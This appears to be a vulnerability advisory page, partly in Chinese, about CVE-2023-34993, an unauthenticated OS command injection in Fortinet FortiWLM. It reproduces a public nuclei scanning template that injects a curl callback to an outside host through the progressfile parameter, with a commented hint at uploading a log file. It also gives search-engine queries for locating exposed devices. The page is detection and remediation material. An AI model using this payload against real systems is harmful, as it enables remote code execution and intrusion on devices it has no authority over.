CVE-2023-34993: Fortinet FortiWLM Unauthenticated Command Injection Vulnerability

日期: 2025-08-01 | 影响软件: Fortinet FortiWLM | POC: 已公开

漏洞描述

A improper neutralization of special elements used in an os command ('os command injection') in Fortinet FortiWLM version 8.6.0 through 8.6.5 and 8.5.0 through 8.5.4 allows attacker to execute unauthorized code or commands Successful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to the affected system.

PoC代码[已公开]

id: CVE-2023-34993

info:
  name: Fortinet FortiWLM Unauthenticated Command Injection Vulnerability
  author: dwisiswant0
  severity: critical
  description: |
    A improper neutralization of special elements used in an os command ('os
    command injection') in Fortinet FortiWLM version 8.6.0 through 8.6.5 and
    8.5.0 through 8.5.4 allows attacker to execute unauthorized code or commands
    Successful exploitation of this vulnerability could allow an attacker to
    bypass authentication and gain unauthorized access to the affected system.
  remediation: |
    For FortiWLM version 8.6.0 through 8.6.5 upgrade to version >= 8.6.6.
    For FortiWLM version 8.5.0 through 8.5.4 upgrade to version >= 8.5.5.
  reference:
    - https://fortiguard.com/psirt/FG-IR-23-140
    - https://www.horizon3.ai/attack-research/attack-blogs/fortiwlm-the-almost-story-for-the-forti-forty/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-34993
    cwe-id: CWE-78
    epss-score: 0.8731
    epss-percentile: 0.99416
    cpe: cpe:2.3:a:fortinet:fortiwlm:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: fortinet
    product: fortiwlm
    shodan-query:
      - http.title:"FortiWLM"
      - http.html:"fortiwlm"
      - http.title:"fortiwlm"
    fofa-query:
      - body="fortiwlm"
      - title="fortiwlm"
    google-query: intitle:"fortiwlm"
  tags: cve,cve2023,fortinet,fortiwlm,rce,unauth
variables:
  progressfile: '{{rand_base(5)}};curl {{interactsh-url}} #' # -F "file=/data/apps/nms/logs/httpd_error_log"

http:
  - method: GET
    path:
      - "{{BaseURL}}/ems/cgi-bin/ezrf_upgrade_images.cgi?op_type=deleteprogressfile&progressfile={{url_encode(progressfile)}}"

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "User-Agent: curl"
# digest: 4a0a00473045022068e4517ed19065a64dbe7dc7f01e91d4510f714e21f2e23d4042792cff3211b7022100d777341268d6e351deb9e36ae2b115fd89c1ec322d90e4b1c05a71a0be151a41:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2023/CVE-2023-34993.yaml